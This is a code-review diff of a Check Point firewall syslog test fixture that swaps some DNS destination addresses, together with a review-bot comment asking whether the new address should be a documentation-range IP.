sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52156"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10176"; xlatesrc:"0.0.0.0"] 
@@ -1034,7 +1034,7 @@ <134>1 2020-03-29T16:22:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb44,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58826"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26788"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:22:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb44,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59719"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:22:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb45,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43173"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43173"; 
service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64880"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10187"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41773"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52432"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10188"; xlatesrc:"0.0.0.0"] 
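Review bot: The added line in this hunk swaps `dst:"8.8.8.8"` for `dst:"175.16.199.1"`, which is a routable public address rather than one of the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), so the fixture still points at live third-party infrastructure; the same substitution recurs in the `@@ -1383` and `@@ -1401` hunks below. If this address was chosen because the GeoIP test database resolves it for enrichment tests, a sentence in the commit description saying so would keep the next reviewer from raising it again; otherwise a TEST-NET address is the safer choice for sample data. Since only the raw `dst` values change here, the corresponding expected-output fixture for this log (if one is kept) presumably needs the matching destination-address update in the same change — worth confirming.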
@@ -1383,13 +1383,13 @@ <134>1 2020-03-29T16:51:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d210,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500688"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51352"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d210,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500688"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40847"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d212,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35610"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34846"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44548"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50096"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500695"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48563"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500695"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52162"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35610"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34846"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44548"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50096"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500695"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48563"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500695"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52162"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d218,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500696"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d21a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500698"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45072"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:51:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d21a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; 
src:"192.168.1.100"] 
